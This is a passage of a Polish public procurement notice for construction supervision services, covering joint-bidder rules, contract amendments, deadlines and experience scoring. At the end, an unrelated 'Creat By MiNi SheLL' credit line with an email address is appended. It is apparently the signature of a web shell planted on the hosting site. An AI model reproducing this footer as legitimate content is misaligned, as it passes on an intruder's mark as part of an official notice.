złożonej oferty ocenie w ramach kryterium: „doświadczenie osób wyznaczonych do realizacji zamówienia – D” nie podlega przepisom art. 273 ust. 1 ustawy Pzp i w przypadku jego niezłożenia w terminie składania ofert wraz z ofertą (wraz z Formularzem ofertowym) Zamawiający nie będzie wzywał Wykonawcy w trybie art. 274 ust. 1 ustawy Pzp do jego złożenia, uzupełnienia lub poprawienia.<br/>4.	Wykaz podwykonawców, podpisany przez Wykonawcę [osobę (osoby) umocowaną prawnie], jeżeli Wykonawca zamierza powierzyć podwykonawcom wykonanie części zamówienia – wzór stanowi Załącznik Nr 4.1 do SWZ dla Części nr 1 zamówienia oraz Załącznik 4.2 do SWZ dla Części nr 2 zamówienia;<br/>5.	Pełnomocnictwo, jeżeli osoba reprezentująca Wykonawcę w niniejszym postępowaniu <br/>nie została wskazana, jako uprawniona do jego reprezentacji we właściwym rejestrze lub <br/>w Centralnej Ewidencji i Informacji o Działalności Gospodarczej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z tych Wykonawców nie może podlegać wykluczeniu z uwagi na którąkolwiek z okoliczności określonych w:<br/>1)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2)	art. 108 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych.<br/>2.	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, tj. oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie określonym przez Zamawiającego (wzór stanowi Załącznik nr 3 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3.	Spełnienie warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o zamówienie będzie weryfikowane przez Zamawiającego zgodnie z art. 117 ust. 3 ustawy Pzp.<br/>4.	W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie, na wykonanie Części nr 1 i/lub Części nr 2 warunek dotyczący zdolności technicznej lub zawodowej w zakresie:<br/>1)	dysponowania osobami zdolnymi do wykonania zamówienia na odpowiednim poziomie jakości, sformułowany w Rozdziale X ust. 3 pkt 1 SWZ, Wykonawcy wspólnie ubiegających się o zamówienie mogą spełniać łącznie. <br/>2)	doświadczenia sformułowany w Rozdziale X ust. 3 pkt 2 SWZ, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie wykaże, że w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał, co najmniej dwie (2) usługi (2 zamówienia / 2 umowy / 2 kontrakty), z których każda polegała na świadczeniu usług w zakresie nadzoru budowlanego nad robotami budowlanymi obejmującymi budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o kubaturze co najmniej 2 500 m3 oraz o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł. (art. 117 ust. 1 Pzp).<br/>5.	Wykonawcy wspólnie ubiegających się o udzielenie zamówienia zobowiązani są do;<br/>1)	ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>2)	złożenia wraz z ofertą Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa <br/>w pkt 1;<br/>3)	złożenia wraz z ofertą oświadczenia, o którym mowa w art. 117 ust. 4 ustawy Pzp, <br/>z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy wspólnie ubiegających się o zamówienie.<br/>6.	Pełnomocnictwo, o którym mowa w ust. 6 pkt 2, winno zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>7.	Wzór oświadczenia, o którym mowa w ust. 6 pkt 3, stanowi Załącznik Nr 6.1 do SWZ dla Części nr 1 zamówienia oraz Załącznik Nr 6.2 do SWZ dla Części nr 2 zamówienia.<br/>8.	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z Pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwości dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokona wyboru Wykonawcy lub wprowadzania do niej dodatkowych postanowień, w zakresie uregulowanym w art. 454 i art. 455 ustawy Pzp oraz wskazanym w przygotowanych Projektach umów, a w szczególności w zakresie wysokości wynagrodzenia należnego Wykonawcy z tytułu wykonania zamówienia w przypadku zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne<br/>d)	zasad gromadzenia i wysokości wpłat pracowniczych planów kapitałowych o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>e)	zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia<br/>– jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>2.	Zamawiający przewiduje możliwości dokonywania zmian postanowień zawartych umów w stosunku do treści ofert, na podstawie których dokona wyboru Wykonawców lub wprowadzania do nich dodatkowych postanowień, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, tj. w przypadku:<br/>1)	konieczności aktualizacji danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy (firmy), adresu siedziby Wykonawcy lub Zamawiającego, albo lokalizacji miejsca gdzie będą realizowane dostawy, zmianę formy prawnej Wykonawcy itp<br/>2)	zmiany przez Ustawodawcę przepisów prawa o charakterze bezwzględnie obowiązującym, z którymi postanowienia umowy pozostałyby w sprzeczności i które będą miały bezpośredni wpływ na realizację zawartej umowy, w szczególności zmiany przepisów prawa budowlanego nakładające na Wykonawcę lub Zamawiającego dodatkowe obowiązki lub czynności, nieprzewidziane w zawartej umowie, których wykonanie w ramach zawartej umowy jest konieczne z uwagi na obowiązujące przepisy prawa<br/>3)	zmiany zasad realizacji umowy w przypadku zaistnienia okoliczności niezależnych od woli Stron, które będą miały bezpośredni wpływ na realizację umowy<br/>4)	działań osób trzecich, w tym niezgodnych z prawem, utrudniających lub uniemożliwiających realizację lub wykonanie umowy, które to działania nie są konsekwencją winy którejkolwiek ze Stron umowy<br/>5)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tzn. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona;<br/>6)	wystąpienie siły wyższej lub zdarzenia losowego wywołanego przez czynniki zewnętrzne.<br/>3.	Zamawiający dopuszcza możliwość dokonywania zmian postanowień zawartych umów w zakresie:<br/>1)	wydłużenia terminu wykonania zamówienia / umowy w przypadku zaistnienia, niezawinionych przez Wykonawcę, okoliczności,<br/>2)	usunięcia rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana treści umowy będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie jej zapisów w celu jej jednoznacznej interpretacji;<br/>4.	Zamawiający dopuszcza możliwość dokonywania zmian postanowień zawartej umowy w zakresie wynagrodzenia należnego Wykonawcy.<br/>5.	Wprowadzenie zmian postanowień niniejszej umowy lub dodatkowych postanowień jest możliwe jedynie w sytuacji, gdy konieczność wprowadzenia takich zmian lub dodatkowych postanowień wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy lub zmiany te są korzystne dla Zamawiającego.<br/>6.	Możliwości zmian zawartej umowy, o których mowa powyżej zostały szczegółowo opisane w Projektach umów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">: Ofertę należy złożyć za pośrednictwem platformazakupowa.pl, na stronie internetowej pod adresem: https://platformazakupowa.pl/pn/powiat_jaroslawski/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W celu uzyskania punktów w kryterium „doświadczenie osób wyznaczonych do realizacji zamówienia – D” Wykonawca zobowiązany jest do złożenia wraz z ofertą ,,Wykazu kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” (wzór stanowi Załącznik Nr 2A.1 do SWZ dla Części nr 1 zamówienia oraz załącznik 2A.2 do SWZ dla Części nr 2 zamówienia). Punkty <br/>w wyżej wymienionym kryterium zostaną przyznane ofercie na podstawie informacji zawartych w złożonym przez Wykonawcę „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, gdzie za każde / każdorazowe wykazanie, że wskazana w wykazie osoba uczestniczyła w realizacji zamówienia oraz zgodnie z posiadanymi uprawnieniami zawodowymi w pracach polegających na:<br/>1)	nadzorowaniu robót budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2024 r. poz. 725 z późn. zm.) obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt;<br/>2)	kierowaniu robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2024 r. poz. 725 z późn. zm.) obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt.<br/>UWAGA: W „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” należy wykazać w kolumnie nr 4 tabeli Wykazu zadania wykonane (zakończone) w okresie ostatnich 5 lat, licząc od dnia składania oferty.<br/>„Wykaz kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” (wzór stanowi Załącznik Nr 2A.1 do SWZ dla Części nr 1 zamówienia oraz załącznik 2A.2 do SWZ dla Części nr 2 zamówienia), składany w celu poddania złożonej oferty ocenie w ramach kryterium: „doświadczenie osób wyznaczonych do realizacji zamówienia – D” nie podlega przepisom art. 273 ust. 1 ustawy Pzp i w przypadku jego niezłożenia w terminie składania ofert wraz z ofertą (wraz z Formularzem ofertowym) Zamawiający nie będzie wzywał Wykonawcy w trybie art. 274 ust. 1 ustawy Pzp do jego złożenia, uzupełnienia lub poprawienia.<br/>W przypadku gdy Wykonawca składa oferty wykonanie obydwu części niniejszego zamówienia i jednocześnie dla każdej z tych części zamówienia osobą odpowiedzialną za sprawowanie nadzoru nad robotami budowlanymi, o której mowa w Rozdziale X ust. 3 pkt 1 lit. a) niniejszej SWZ, będzie ta sama osoba, Wykonawca zobowiązany jest do złożenia wraz <br/>z Formularzami ofertowymi oddzielnych „Wykazów kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, dla każdej z części zamówienia na którą składa ofertę - wzory wykazów stanowią odpowiednio Załącznik Nr 2A.1 do SWZ dla Części nr 1 zamówienia oraz Załącznik 2A.2 do SWZ dla Części nr 2 zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com